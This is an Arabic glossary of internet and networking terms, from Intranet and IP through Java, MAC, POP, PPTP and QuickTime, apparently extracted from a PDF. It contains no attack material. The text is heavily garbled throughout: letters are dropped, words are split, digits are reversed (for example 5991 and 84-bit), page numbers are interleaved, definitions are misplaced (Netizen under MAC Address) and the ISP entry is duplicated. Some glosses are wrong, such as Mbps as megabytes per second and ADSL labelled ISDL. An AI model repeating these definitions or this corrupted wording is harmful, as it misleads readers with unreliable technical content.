، TCP/IP‬يتیح لمزودات ويب‪ ‬‬ ‫الشتراك في عملیة إرسال متعدد لحزم ‪ ( IP‬‬ ‫( ‪ ،multicast‬كوسیلة فعالة لرسال الحزمة إلى‪ ‬‬ ‫مجموعة من الكمبیوتر المضیفة في إنترنت‪ .‬‬ ‫أحد خیارين توفرھ ما معظم برمجیات البريد‪ ‬‬ ‫‪)Immediate delivery‬التوصیل الفوري)‬ ‫اللكتروني‪ ،‬ويتیح إمكانیة إرسال الرسائل اللكترونیة‬ ‫فور النتھاء من كتابتھا‪ .‬وإذا لم تكن على اتصال‪ ‬‬ ‫بالشبكة وقت النتھاء من كتابة الرسالة‪ ،‬فسیقوم‪ ‬‬ ‫ی بفتح الخط الھاتفي لتأمین التصال‪ ‬‬ ‫البرنامج تلقائ ً‬ ‫ا‪ ‬‬ ‫بالشبكة‪ .‬والخیار الخر ھو التوصیل المؤجل‪ ‬‬ ‫‪ ،deferred delivery‬حیث يحتفظ البرنامج بالرسائل‪ ‬‬ ‫التي كتبتھا في صندوق الصادر‪ ، outbox‬إلى أن‪ ‬‬ ‫تحقق التصال مع الشبكة‪ ،‬وتصدر أمًر بإرسال ما‪ ‬‬ ‫ا‪ ‬‬ ‫يحتويه صندوق الصادر من رسائل جديدة دفعة‪ ‬‬ ‫واحدة‪ .‬‬ ‫‪Internet Network Information Center‬الھیئة‪ ‬‬ ‫‪)Inter NIC‬مركز سبكة المعلومات النترنت)‬ ‫الدارية المسؤولة ( من بین أمور أخرى ) عن منح‪ ‬‬ ‫أسماء النطاقات وتوزيع وثائق ‪ RFC.‬وتحظى ھذه‪ ‬‬ ‫الھیئة بالدعم المالي من قبل المؤسسة الوطنیة‪ ‬‬ ‫ی مؤسسة‪ ‬‬ ‫المريكیة للعلوم‪ ، NSF‬وتديرھا حال ً‬


‫ا‪ ‬‬ ‫ض‪ RFC.‬‬ ‫‪Network Solution‬وشركة ‪ AT&T..‬انظر أي ً‬ ‫ا‪ ‬‬ ‫‪ 945‬‬ ‫‪ )(I‬‬ ‫شبكة محلیة ( ‪ ( LAN‬أو واسعة( ‪ ، ( WAN‬تستخدم‬ ‫‪)Intranet‬انترنت)‬ ‫في المؤسسات الكبیرة‪ ،‬ول يشترط أن تكون متصلة‬ ‫بشبكة إنترنت‪ ،‬وإنما تؤمن وظائف مشابھة لھا على‬ ‫مستوى المؤسسة‪ ،‬ومن خلل برامج المتصفحات‪ .‬‬ ‫ُستخدم مز ّدات ويب في شبكات إنترانت‪ ،‬بد ً من‪ ‬‬ ‫ت‪ ‬‬ ‫و‬ ‫ل‬ ‫مز ّدات الملفات أو مز ّدات التطبیقات التقلیدية‪ ،‬‬ ‫و‪ ‬‬ ‫و‬ ‫لنشر المعلومات ذات البنیة التشعبیة‪ ،‬بشكل بسیط‬ ‫ومتجانس‪ ،‬وتسھیل عملیات صیانتھا وتحديثھا‪ ،‬‬ ‫وتوفیرھا للعاملین بشكل فوري‪ ،‬بدون العتماد على‬ ‫ا‪ ‬‬ ‫ت‪ ‬‬ ‫المطبوعات الورقیة المكلفة‪ ،‬والتي تستغرق وق ً‬ ‫طوي ً لتوزيعھا على كافة فروع وأقسام المؤسسة‪ ،‬ل‪ ‬‬ ‫ا‪ ‬‬ ‫عند كل تعديل! وشھ دت شبكات إنترانت نموً كبیًر‪ ‬‬ ‫ا‪ ‬‬ ‫منذ عام ‪ ،5991‬بسبب توفر برامج المتصفحات‪ ،‬‬ ‫وبرامج إنشاء مز ّدات ويب‪ ،‬على نطاق واسع‪ ،‬‬ ‫و‪ ‬‬ ‫ن ( مثل متصفح إنترنت‪ ‬‬ ‫وبأسعار معقولة‪ ،‬أو مجا ً‬ ‫ا‪ ‬‬ ‫إكسبلورر من مايكروسوفت )‪.‬وتتیح بعض‪ ‬‬ ‫المؤسسات الوصول إلى أجزاء من شبكة إنترانت‪ ‬‬ ‫الخاصة بھا‪ ،‬لبعض الشخاص أو المؤسسات‪ ‬‬ ‫الخرى‪ ،‬عبر شبكة ويب‪ ،‬أو عبر اتصال ھاتفي‪ ‬‬ ‫مباشر( ‪ ، ( dial­in‬وعندھا تدعى ھذه الجزاء‪ ‬‬ ‫"شبكة إكسترانت‪ ".‬‬ ‫( ‪( Internet Protocol‬البروتوكول المسؤول عن‪ ‬‬ ‫تراسل حزم البیانات عبر إنترنت وتوجیھھا إلى‪ ‬‬ ‫‪)IP‬بروتوكول انترنت)‬ ‫أھدافھ ا‪ .‬ويشبه دمغ حزمة ‪ IP‬بعنوان أحد‪ ‬‬ ‫الكمبیوترات المتصلة بإنترنت‪ ،‬إلى حد بعید‪ ،‬كتابة‪ ‬‬ ‫العنوان على مغلف الرسالة قبل إلقاھا في صندوق‪ ‬‬ ‫الرسائل‪ .‬ويلعب بروتوكول ‪ IP‬دور صندوق الرسائل‪ ،‬‬ ‫وھو يتیح للموجھات والشبكات المعنیة بنقل‪ ‬‬ ‫الرسالة‪ ،‬أن تتبادل الشارات بما يكفل تعاونھا في‪ ‬‬ ‫ض ‪ TCP‬و و‪ UDP.‬‬ ‫إيصال الحزمة إلى وجھتھا‪ .‬انظر أي ً‬ ‫ا‪ ‬‬ ‫( ‪( Asymmetric Digital Subscriber Line‬تقنیة‪ ‬‬ ‫للخطوط الھاتفیة الرقمیة‪ ،‬توفر اتصا ً عالي السرعة‪ ‬‬ ‫ل‪ ‬‬ ‫‪)ISDL‬خط الشتراك الرقمي اللتناظري)‪ ‬‬ ‫عبر أسلك نحاسیة عادية‪ .‬وتروج شركة ‪ AT & T‬‬ ‫لھذه التقنیة كبديل لتقنیة ‪ ISDN‬في تحقیق الوصول‬ ‫إلى إنترنت‪ .‬توصف ھذه الخطوط بالتناظرية‪ ‬‬


‫‪asymmetric‬لن سرعة نقلھا للبیانات غیر متساوية‬ ‫في التجاھین‪ :‬ففیما ل تتجاوز سرعتھا بین‪ ‬‬ ‫المشترك والمزود ‪uplink‬معدل ‪ 46‬كیلوبت في‪ ‬‬ ‫الثانیة‪ ،‬فإن سرعتھا بالتجاه المعاكس ‪ ) downlink‬‬ ‫وھي الھم ) يمكن أن تصل إلى ‪ 6‬میجابت في‪ ‬‬ ‫الثانیة‪ .‬وت‪ ‬‬ ‫ب ما‪ ‬‬ ‫‪ ( Internet Service Provider ( ،‬شركة‪ ،‬غال ً‬ ‫ا‪ ‬‬ ‫تكون محلیة‪ ،‬توفر خدمات إنترنت لمن يحتاجھا‪ ‬‬ ‫‪ 055‬‬ ‫ب ما‬ ‫( ‪ ( Internet Service Provider‬شركة‪ ،‬غال ً‬ ‫ا‪ ‬‬ ‫‪)ISP‬موفر خدمة النترنت)‬ ‫تكون محلیة‪ ،‬توفر خدمات إنترنت لمن يحتاجھا‪ ‬‬ ‫مقابل رسوم شھرية أو بالساعة‪ .‬‬ ‫‪ 155‬‬ ‫‪ )(J‬‬ ‫لغة برمجة كائنیة‪ ، object­oriented‬طورتھا شركة‪ ‬‬ ‫‪)Java‬جافا)‬ ‫‪ ،Sun Microsystems‬وتستخدم لضافة الرسوم‪ ‬‬ ‫المتحركة‪ ،‬وأسعار البورصة الفورية‪ ،‬وغیرھا من المزايا‪ ‬‬ ‫الدينامیكیة إلى صفحات ويب‪ .‬تتیح لغة جافا إمكانیة‪ ‬‬ ‫كتابة بريمجات ) ‪ applets‬عبارة عن برامج تطبیقات‪ ‬‬ ‫صغیرة )‪ ،‬يمكن إرسالھا من المزود ‪ server‬إلى‪ ‬‬ ‫المتصفح‪ ،‬الذي يستطیع فك شیفرتھا وتنفیذھا‪ ،‬‬ ‫بواسطة ما يسمى آلة جافا الفتراضیة ‪ Java virtual‬‬ ‫‪ ،machine JVM‬التي تكون مدمجة فیه أو تضاف إلیه‪.‬‬ ‫وينبغي للة جافا الفتراضیة أن تكون متوافقة مع‪ ‬‬ ‫المنصة التي تعمل علیھا‪ ،‬أما بريمجات جافا فیمكن‪ ‬‬ ‫تنفیذھا على أي منصة تحتوي على آلة جافا‪ ‬‬ ‫الفتراضیة‪ ،‬سواء كانت منصات ماكنتوش أو ويندوز أو‪ ‬‬ ‫غیرھما‪ ،‬ولذلك توصف لغة جافا بأنھا مستقلة عن‪ ‬‬ ‫المنصة ‪ platform independent .‬وتوفر آلة جافا‪ ‬‬ ‫الفتراضیة تدابیر أمنیة لحماية موارد وبیانات الكمبیوتر‪ ‬‬ ‫الذي يستضیفھ ا‪ ،‬من احتمالت العبث والتخريب‪ .‬توفر‪ ‬‬ ‫معظم برامج التصفح شائعة الستخدام‪ ،‬الدعم للغة‪ ‬‬ ‫ی على تطوير رقاقات‪ ‬‬ ‫جافا‪ .‬وتعكف شركة صن حال ً‬ ‫ا‪ ‬‬ ‫معالجات خاصة لتشغیل تطبیقات جافا بكفاءة عالیة‪ ،‬‬ ‫بدون الحاجة إلى آلت جافا الفتراضیة ‪.‬وتعمل العديد‪ ‬‬ ‫من الشركات على إنتاج أدوات تطوير خاصة بلغة جافا‪ .‬‬ ‫وفیما ل تدير مايكروسوفت ظھرھا للغة جافا‪ ،‬فإنھا‪ ‬‬ ‫تنتھج سیاسة مناوئة لشركة صن‪ ،‬فیما يتعلق‪ ‬‬ ‫بمواصفاتھا‪ ،‬وھي تجاھد من جھة أخرى للترويج‪ ‬‬ ‫لتقنیتھا المنافسة‪ ActiveX. ،‬‬ ‫‪)JavaScript‬جافا اسكربت)‪ ‬لغة طورتھا كل من شركتي ‪ Sun Microsystems‬‬ ‫و‪ ،Netscape‬لتسھیل إضافة مزايا تفاعلیة إلى صفحات‬ ‫ويب‪ .‬وعلى الرغم من كونھا مشتقة من لغة جافا‪ ،‬‬ ‫فإن جافاسكريبت تمثل لغة منفصلة‪ ،‬وإلى حد ما‪ ،‬أكثر‬ ‫بساطة‪ .‬وتنحصر فاعلیة جافاسكريبت في جھة الزبون‪ ‬‬ ‫‪ ،client‬حیث أن المفسر‪ ، interpreter‬الذي ينفذ‪ ‬‬ ‫ج في المتصفح‪ .‬‬ ‫تعلیماتھا‪ ،‬يكون مدم ً‬


‫ا‪ ‬‬ ‫‪ 255‬‬ ‫‪ )(L‬‬ ‫(جدول التعرف) ‪ Learn Table‬‬ ‫جدول من المعلومات يضم قائمة بالبوابات‪ ،‬يرافق كل‬ ‫منھا عنوان بطول ‪ 84‬بت‪ .‬عندما يصل إطار معین‪ ،‬‬ ‫تجري البحث عن عنوان ھدفه ضمن جدول التعرف‪ ،‬‬ ‫فإما أن ُرشح أو ُمرر إلى البوابة أو البوابات‪ ‬‬ ‫ي‪ ‬‬ ‫ي‬ ‫ف‪ ،‬يبث‪ ‬‬ ‫الملئمة‪ .‬إذا لم يكن عنوان الھدف معرو ً‬ ‫ا‪ ‬‬ ‫الطار‪ ،‬عادة‪ ،‬إلى جمیع البوابات‪ُ .‬حافظ على حداثة‬ ‫ي‪ ‬‬ ‫جدول التعرف‪ ،‬بفحص عناوين المصدر للطارات‪ ‬‬ ‫المتسلمة وتحديث الجدول وفقً لذلك‪ .‬و"يذكر"‪ ‬‬ ‫ا‪ ‬‬ ‫الجدول‪ ،‬بذلك أية محطة مرتبطة بأية بوابة‪ .‬ويمكن‪ ‬‬ ‫التعامل مع ھذا الجدول مباشرة عبر إمكانیات الدارة‬ ‫في البدالت‪ .‬‬ ‫‪)Link‬رابط)‪ ‬‬ ‫تستخدم كلمة وصلة‪ ،‬في سیاق الحديث عن‪ ‬‬ ‫شبكة ويب‪ ،‬للدللة على نص أو صورة‪ ،‬يمكن‪ ‬‬ ‫بتفعیلھ ا الوصول إلى مكان آخر في الصفحة ذاتھا أو‪ ‬‬ ‫في خارجھا‪ .‬ويمكن تفعیل الوصلة بالنقر علیھا‪ ‬‬ ‫بالماوس‪ ،‬أو بنقل المؤشر علیھا بواسطة مفتاح‪ ‬‬ ‫‪ ،Tab‬ثم الضغط على مفتاح ‪ Enter.‬تشیر كلمة‪ ‬‬ ‫ض‪ ،‬إلى التصال بین كمبیوترك وبقیة‪ ‬‬ ‫وصلة أي ً‬ ‫ا‪ ‬‬ ‫الشبكة‪ .‬وتكون مثل ھذه الوصلت على أنواع‪ :‬فقد‪ ‬‬ ‫تكون عبر خط ھاتفي بإدارة الرقم‪ ، dialup‬أو عبر‪ ‬‬ ‫توصیلت الشبكة المحلیة‪ ،‬أو بواسطة خط ( ھاتفي‬ ‫ی‪ ،‬بواسطة الشعة‪ ‬‬ ‫) مؤجر‪ ، leased line‬أو لسلك ً‬ ‫ا‪ ‬‬ ‫تحت الحمراء أو موجات الراديو‪ .‬‬ ‫‪)Loop Back‬الحلقة الراجعة)‪ ‬‬ ‫آلیة في مرسلت‪/‬مستقبلت إثرنت‪ ،‬تجعل البیانات‪ ‬‬ ‫المرسلة من بوابة ‪ AUI‬أو ‪ MII‬إلى‪ ، MAU‬تعود إلى‪ ‬‬ ‫خطوط الرسال في واجھة ‪ AUI‬أو‪ ، MII‬وھي‪ ‬‬ ‫تستخدم لغراض التشخیص‪ .‬‬ ‫‪ 355‬‬ ‫‪ ) (M‬‬ ‫‪ MAC Address­MAC‬‬ ‫مصطلح مختصر للعبارة ‪ Internet citizen‬التي تعني‪ ‬‬ ‫"مواطن الشبكة"‪ .‬يشیر ھ ذا المصطلح إلى حالة الفراد‪ ‬‬ ‫الذي يشعرون بانتماء قوي إلى شبكة إنترنت‪ ،‬وكأنھا‪ ‬‬ ‫موطنھم‪ ،‬فیراعون قوانینھا المكتوبة وغیر المكتوبة‪ ،‬‬ ‫ويحرصون على سلمتھا وأمنھا‪ ،‬ويھتمون بتطورھا‪ ‬‬ ‫ومستقبلھا‪ .‬ويوصف مثل ھؤلء بأنھم مواطنو شبكة‪ ‬‬ ‫صالحون‪ good netizen.‬‬ ‫‪)MAC­ Media Access Controller‬التحكم بالوصول‪ ‬‬


‫وحدة تحكم تسمح بالوصول إلى وسائط إثرنت (القراص‪ ‬‬ ‫للوسائط)‪ ‬‬ ‫الصلبة‪ ،‬المدمجة‪ ،‬الخ)‪ ،‬والتعرف على مواصفاتھا‪ .‬تنجز‪ ‬‬ ‫‪MAC‬عادة‪ ،‬عملیة تحويل البیانات من الشكل المتوازي‪ ‬‬ ‫إلى التسلسلي‪ ،‬وبالعكس‪ .‬وتعمل كواجھة بین نظام‪ ‬‬ ‫الناقل المتوازي ثنائي التجاه‪ ،‬والواجھة البینیة‪ ‬‬ ‫التسلسلیة للوسائط ‪ .Add­On‬‬ ‫عنوان مؤلف من ستة بايتات يعطي لجھاز يعمل ضمن‪ ‬‬ ‫‪)MAC­Address‬عنوان)‪ ‬‬ ‫شبكة إثرنت ‪.‬يفحص كل جھاز على الشبكة أول ستة‪ ‬‬ ‫بايتات من كل إطار يتسلمه‪ ،‬ويقارنھا مع عنوان ‪ MAC‬‬ ‫للمحطة المرسلة‪ ،‬بدًء من البايت رقم ‪ 7‬وحتى ‪ 21‬‬ ‫ا‪ ‬‬ ‫ن‪ .‬‬ ‫ضم ً‬ ‫ا‪ ‬‬ ‫‪)Mailing List‬قوائم البريد)‪ ‬‬ ‫تشیر العبارة بشكل عام إلى قوائم تضم عناوين للبريد‪ ‬‬ ‫ي‪ ،‬لغرض استخدامھا في‪ ‬‬ ‫ی أو يدو ً‬ ‫اللكتروني‪ُ ،‬شكل آل ً‬ ‫ت‪ ‬‬ ‫ا‬ ‫ا‬ ‫توجیه رسائل إلكترونیة إلى الجھات التي تتضمنھا ھذه‪ ‬‬ ‫القوائم‪ .‬ويمكن للغالبیة العظمى من برامج البريد‪ ‬‬ ‫اللكتروني‪ ،‬تكرار بث رسالة معینة‪ ،‬إلى قائمة تضم‪ ‬‬ ‫مجموعة من العناوين‪ .‬تشیر العبارة في سیاق إنترنت‪ ،‬‬ ‫إلى مجموعة من المستخدمین الذي ينتسبون إلى جھة‬ ‫معینة بھدف تلقي الرسائل التي تصدرھا حول موضوع‪ ‬‬ ‫ی‪ ،‬إلى جمیع‪ ‬‬ ‫محدد‪ .‬وتصل مثل ھذه الرسائل تلقائ ً‬ ‫ا‪ ‬‬ ‫المسجلین في القائمة‪ .‬وازدھرت قوائم البريد في‪ ‬‬ ‫الماضي عندما كانت بالنسبة للكثیرين‪ ،‬الوسیلة الوحیدة‬ ‫للحصول على معلومات عبر الشبكة‪ .‬لكن الكثیر من ھذه‬ ‫القوائم الكبیرة استبدلت‪ ،‬فیما بعد‪ ،‬بالمجموعات‪ ‬‬ ‫ی‪ ،‬‬ ‫الخبارية ‪ newsgroups.‬وتستخدم قوائم البريد حال ً‬ ‫ا‪ ‬‬ ‫لنشر المعلومات عن موضوعات شديدة التخصص‪ ،‬ولنشر‬ ‫الرسائل في المجموعات المغلقة‪ ،‬ولغراض الترويج‪ ‬‬ ‫التجاري‪ ،‬حیث يتطفل علیك مرسلوھا‪ ،‬بصرف النظر عن‪ ‬‬ ‫رغبتك في تلقیھا‪ .‬‬ ‫‪ 455‬‬ ‫(میجا بايت في الثانیة)‪ Mbps‬‬ ‫واحدة لقیاس عرض الحزمة‪ ،‬وتعني كلمة "میجا" في ھذا‬ ‫السیاق‪ ،‬الرقم ‪ 01‬مرفوع ً إلى الس ‪ ،6‬ولیست القیمة‪ ‬‬ ‫ا‪ ‬‬ ‫المعروفة التي تساوي ‪ .4201×4201‬‬ ‫‪ ( Multipurpose Internet Mail Extension )MIME‬‬ ‫بروتوكول لنقل البیانات التي لیست على ھیئة‪ ، ASCII‬‬ ‫مثل الصور والرسومیات والصوات عبر إنترنت‪ ،‬باستخدام‪ ‬‬ ‫ض ‪ POP‬و‪ ‬‬ ‫بروتوكول نقل النصوص‪ ،‬مثل ‪ SMTP.‬انظر أي ً‬ ‫ا‪ ‬‬ ‫‪ .SMTP‬‬ ‫‪ 555‬‬


‫‪ )(N‬‬ ‫‪ Netiquette network etiquette‬‬ ‫ی من قواعد اللیاقة‪ ‬‬ ‫مجموعة غیر معتمدة رسم ً‬ ‫ا‪ ‬‬ ‫والسلوك‪ ،‬التي يستحب اتباعھا في التعاملت‪ ‬‬ ‫عبر إنترنت‪ ،‬وغیرھا من الشبكات العامة‪ .‬وتھدف‪ ‬‬ ‫ا‪ ‬‬ ‫ح‪ ‬‬ ‫ن مري ً‬ ‫ھذه القواعد إلى جعل الشبكة مكا ً‬ ‫ا‪ ‬‬ ‫لمستخدمیھا‪ ،‬واستخدام مواردھا بصورة عقلنیة ‪.‬‬ ‫ب ما يجري التذكیر بھا‪ ،‬‬ ‫من الداب التي غال ً‬ ‫ا‪ ‬‬ ‫استخدام البريد اللكتروني بد ً من المجموعات‪ ‬‬ ‫ل‪ ‬‬ ‫الخبارية لتبادل الرسائل الشخصیة‪ ،‬والخروج من‪ ‬‬ ‫الشبكة ‪ log out‬عند التوقف عن استخدامھا‪ ،‬‬ ‫وطباعة الرسائل ( النجلیزية ) بحروف صغیرة‪ ‬‬ ‫وكبیرة‪ ،‬بد ً من القتصار على الحروف الكبیرة‪ ‬‬ ‫ل‪ ‬‬ ‫فقط‪ ،‬واللتزام بقواعد التھذيب وعدم التعرض‪ ‬‬ ‫للشخاص خلل الحوارات التي تجري في محافل‪ ‬‬ ‫ومنتديات إنترنت‪ .‬ومن التعالیم القديمة في‪ ‬‬ ‫النیتیكیت‪ ،‬عدم استخدام البريد اللكتروني‪ ‬‬ ‫والمجموعات الخبارية لغراض الترويج التجاري‪ ،‬‬ ‫وعدم اللجوء إلى التصال بكمبیوتر بعید‪ ،‬إذا توفر‪ ‬‬ ‫كمبیوتر قريب يفي بالغرض‪ .‬لكن أولى ھاتین‪ ‬‬ ‫القاعدتین بدأت بالندثار‪ ،‬نتیجة تعمق الطابع‪ ‬‬ ‫التجاري لنترنت‪ ،‬وأصبحت الثانیة غیر ذات معنى‪ ‬‬ ‫نتیجة شیوع استخدام متصفحات ويب‪ ،‬التي ل‪ ‬‬ ‫تظھ ر لنا الموقع الجغرافي للكمبیوترات المضیفة‪ ‬‬ ‫التي نزورھا‪ .‬‬ ‫مصطلح مختصر للعبارة ‪ Internet citizen‬التي‪ ‬‬ ‫‪)Netizen‬مواطن الشبكة)‪ ‬‬ ‫تعني "مواطن الشبكة"‪ .‬يشیر ھذا المصطلح إلى‪ ‬‬ ‫حالة الفراد الذي يشعرون بانتماء قوي إلى شبكة‬ ‫إنترنت‪ ،‬وكأنھا موطنھم‪ ،‬فیراعون قوانینھا المكتوبة‪ ‬‬ ‫وغیر المكتوبة‪ ،‬ويحرصون على سلمتھا وأمنھا‪ ،‬‬ ‫ويھتمون بتطورھا ومستقبلھا‪ .‬ويوصف مثل ھؤلء‪ ‬‬ ‫بأنھم مواطنو شبكة صالحون‪ good netizen.‬‬ ‫( ‪( Network News Transfer Protocol‬البرتوكول‪ ‬‬ ‫‪)NNTP‬بروتوكول النقل لشبكة الخبار)‪ ‬‬ ‫المستخدم في نقل رسائل شبكة ‪ Usenet‬عبر‪ ‬‬ ‫إنترنت‪ .‬‬ ‫‪ 655‬‬ ‫‪ )(P‬‬ ‫(الرزم)‪ Packets‬‬ ‫قطعة من المعلومات التي ترسلھا العقد على الشبكة‬ ‫إلى بعضھا البعض‪ .‬يسمى قسم البیانات من الرزمة‪ ‬‬ ‫"الطار "يمكن أن تكون الرزمة وحیدة الھدف ( ‪ (Unicast‬‬ ‫أي مرسلة إلى جھاز واحد‪ ،‬أو متعددة الھداف‪ ‬‬


‫(‪(Multicast‬أي مرسلة إلى جمیع الجھزة‪ ،‬أو عامة‪ ‬‬ ‫الھدف ( ‪ (Broadcast‬أي مرسلة إلى كل الجھزة على‪ ‬‬ ‫الشبكة‪ .‬‬ ‫قطعة من البیانات‪ ،‬تنشأ نتیجة لتشطیر الرسالة‪ ‬‬ ‫‪)Packet‬حزمة)‪ ‬‬ ‫المتض ِنة للمعلومات المراد نقلھا عبر الشبكة‪ ،‬إلى‪ ‬‬ ‫م‪ ‬‬ ‫كتل صغیرة‪ ،‬تضاف إلیھا بیانات خاصة بالتحكم في‪ ‬‬ ‫النقل وعنوان الوجھة التي تقصدھا‪ .‬وترسل ھذه‪ ‬‬ ‫الحزم فرادى‪ ،‬عبر المسارات المتاحة في الشبكة‪ ،‬‬ ‫لیصار إلى إعادة تجمیعھا عندما تبلغ وجھتھا‪ ،‬لرجاعھا‬ ‫إلى ھیئتھ ا الصلیة‪ .‬تستخدم تقنیة تجزئة البیانات‪ ‬‬ ‫إلى حزم في الغالبیة العظمى من الشبكات الرقمیة‪ ‬‬ ‫فائقة السرعة‪ ،‬وھي تمثل أساس مجموعة‪ ‬‬ ‫بروتوكولت‪ ، TCP/IP‬المستخدمة في إنترنت‪ .‬‬ ‫‪ (Packet Internet Groper)PING‬‬ ‫أحد تطبیقات‪ ، TCP/IP‬يستخدم لكشف ما إذا كان‪ ‬‬ ‫كمبیوتر معین متص ً بالشبكة وجاھًز للتصال به‪ .‬ويتم‬ ‫ل‪ ‬‬ ‫ا‬ ‫كشف حالة كمبیوتر ما‪ ،‬بإرسال إشارة إرجاع الصدى‪ ‬‬ ‫ض‪ ICMP.‬‬ ‫‪ICMP echo request‬وانتظار الرد‪ .‬انظر أي ً‬ ‫ا‪ ‬‬ ‫‪)POP‬بروتوكول مكتب البريد)‪ ‬‬ ‫( ‪( Post Office Protocol‬بروتوكول لنقل النصوص‪ ،‬‬ ‫يستخدم لرسال واستخراج رسائل البريد اللكتروني‪ ‬‬ ‫ف لبروتوكول‪ ، SMTP‬الذي‪ ‬‬ ‫ضمن شبكة إنترنت‪ .‬وخل ً‬ ‫ا‪ ‬‬ ‫يستخدم لنقل رسائل البريد بین النظم المزودة‪ ،‬يوفر‪ ‬‬ ‫بروتوكول ‪ POP‬وسیلة لتفاعل برامج البريد مع صناديق‪ ‬‬ ‫البريد الفتراضیة‪ ،‬التي تحتفظ بالرسائل إلى حین‪ ‬‬ ‫استخراجھا أو إرسالھا إلى وجھاتھا‪ .‬يتوفر بروتوكول‪ ‬‬ ‫‪POP‬تحت اسمین ‪2 POP‬و ‪3 POP.‬والتشابھة بین‪ ‬‬ ‫ھذين البروتوكول ھو في السم فقط‪ ،‬وھما غیر‪ ‬‬ ‫ض‪ SMTP.‬‬ ‫متوافقین على الطلق‪ .‬انظر أي ً‬ ‫ا‪ ‬‬ ‫ا‪ ‬‬ ‫( ‪( Point­to­Point Protocol‬البروتوكول الكثر انتشاًر‪ ‬‬ ‫لتحقیق التصال بإنترنت بواسطة إدارة رقم ھاتفي‪ ‬‬ ‫‪dial­up.‬ويشبه ‪ PPP‬البروتوكول ‪ SLIP‬ولكنه أكثر‪ ‬‬ ‫استقراًر واعتمادية‪ ،‬حیث يفتقر الثاني إلى إمكانیات‪ ‬‬ ‫ا‪ ‬‬ ‫ضغط البیانات‪ ،‬واكتشاف الخطاء‪ ،‬ودعم تعددية‪ ‬‬ ‫البروتوكولت على الخط الواحد‪ .‬ويوفر ‪ PPP‬جمیع ھذه‪ ‬‬ ‫ض ‪ SLIP‬و‪ PPTP.‬‬ ‫المزايا‪ ،‬ويزيد‪ .‬انظر أي ً‬ ‫ا‪ ‬‬ ‫‪)PPP‬بروتوكول التصال من نقطة إلى نقطة)‪ ‬‬ ‫( ‪( Point­to­Point Tunneling Protocol‬شكل متقدم‪ ‬‬ ‫من بروتوكول ‪ PPP‬يقوم على "حفر نفق ‪ " Tunneling‬‬ ‫بین نقطتین في شبكة‪ .‬ينتج ھذا النفق الفتراضي‪ ‬‬ ‫عن تعلیب الحزم العائدة لبروتوكول معین‪ ،‬ضمن حزم‪ ‬‬


‫‪ 755‬‬ ‫‪)PPTP‬بروتوكول النفق من نقطة إلى نقطة)‪ ‬‬ ‫عائدة لبروتوكول آخر‪ ،‬وھو ما يسمح بنقل البیانات في‬ ‫ھیئة بروتوكولت‪ ، TCP/IP‬عبر شبكات ل تعمل بھذه‪ ‬‬ ‫البروتوكول ‪.‬ويتمثل الستخدام الكثر شیوع ً لبروتوكول‬ ‫ا‪ ‬‬ ‫‪ PPTP‬في تحقیق التصال بین الشبكات الفیزيائیة‪ ‬‬ ‫المتباعدة‪ ،‬وصو ً إلى شبكة افتراضیة واحدة تستخدم‬ ‫ل‪ ‬‬ ‫ض‪ PPP.‬‬ ‫إنترنت كواسطة للتصال فیما بینھا‪ .‬انظر أي ً‬ ‫ا‪ ‬‬ ‫دس البروتوكولت)‪ ‬‬ ‫‪ْ َ )Protocol Stack‬‬ ‫ك‪ ‬‬ ‫مجموعة من الروتینات والبینیات البرمجیة‪ ،‬تؤمن‪ ‬‬ ‫بمجموعھ ا التصال المنطقي بین برامج التطبیقات‪ ‬‬ ‫وتوصیلت الشبكة‪ .‬ويمكننا تخیل ھذه البروتوكولت‪ ‬‬ ‫على شكل طبقات وظیفیة تتوضع فوق بعضھا‪ ،‬بحیث‪ ‬‬ ‫تؤدي كل طبقة عملھا‪ ،‬وتمرر مخرجاتھا إلى الطبقة‪ ‬‬ ‫العلى أو الدنى منھا‪ ،‬حسب مقتضى الحال‪ .‬‬ ‫‪)Protocol‬البروتوكول)‪ ‬‬ ‫ھو اللغة التي تتخاطب بھا أجھزة الكمبیوتر المتصلة‪ ‬‬ ‫عبر الشبكة‪ ،‬بھ دف تبادل المعلومات‪ .‬وإذا أردنا تعريف‪ ‬‬ ‫البروتوكول بلغة تقنیة‪ ،‬نقول أنه وصف رسمي لھیئات‪ ‬‬ ‫الرسائل والقواعد التي يجب على كمبیوترين اتباعھا‪ ‬‬ ‫لتبادل تلك الرسائل ‪.‬تستطیع البروتوكول وصف تفاصیل‬ ‫البنیة التحتیة للواجھ ة البینیة بین كمبیوترين اتباعھا‪ ‬‬ ‫لتبادل تلك الرسائل‪ .‬تستطیع البروتوكولت وصف‪ ‬‬ ‫تفاصیل البنیة التحتیة للواجھ ة البینیة بین كمبیوترين (‬ ‫مثل ترتیب البتات والبايتات المرسلة عبر السلك ‪ (.‬‬ ‫ض‪ ،‬وصف عملیات التبادل التي تجري بین‪ ‬‬ ‫وتستطیع أي ً‬ ‫ا‪ ‬‬ ‫البرامج على مستوى البنیة الفوقیة ( مثل الطريقة‪ ‬‬ ‫التي يتبادل بھا برنامجان‪ ،‬الملفات عبر إنترنت) ‪ .‬‬ ‫‪ 855‬‬ ‫‪ )(Q‬‬ ‫‪)QuickTime QT‬كويك تايم) معمارية خاصة ابتكرتھا شركة أبل‪ ،‬للتعامل مع‪ ‬‬ ‫البیانات الحساسة لعنصر الوقت‪ ،‬مثل الصوت‪ ‬‬ ‫والفیديو‪ .‬وھي تمتاز بالقدرة على المواقتة ما بین‪ ‬‬ ‫عدة مسارات للصوت والصورة‪ ،‬وضغط البیانات وإزالة‪ ‬‬ ‫الضغط عنھا( ‪ ، ( compression decompression‬‬ ‫لعادتھا إلى ھیئتھا الصلیة‪ ،‬واعتماد ھیئة عامة‪ ‬‬ ‫للبیانات‪ ،‬يمكن التعامل معھا بواسطة نظم غیر‪ ‬‬ ‫متوافقة‪ .‬اسم برنامج يوفر المزايا المشار إلیھا أعله ‪.‬‬ ‫وتتوفر وظائف ‪ QuickTime‬كتوسعة لنظام تشغیل‪ ‬‬ ‫ماكنتوش‪ ،‬في حین أنھا تعتمد في نظم ‪ PC‬على‪ ‬‬ ‫برنامج مكتبة الربط الدينامیكي ‪ DLL.‬ھیئة ملف‪ ‬‬ ‫بیانات يتوافق مع مواصفات‪ ، QuickTime‬كأن تقول‪ ‬‬ ‫تلقیت ‪:‬لقطة فیديو من نوع‪ QuickTime.‬‬ ‫‪ 955‬‬ ‫‪ )(R‬‬


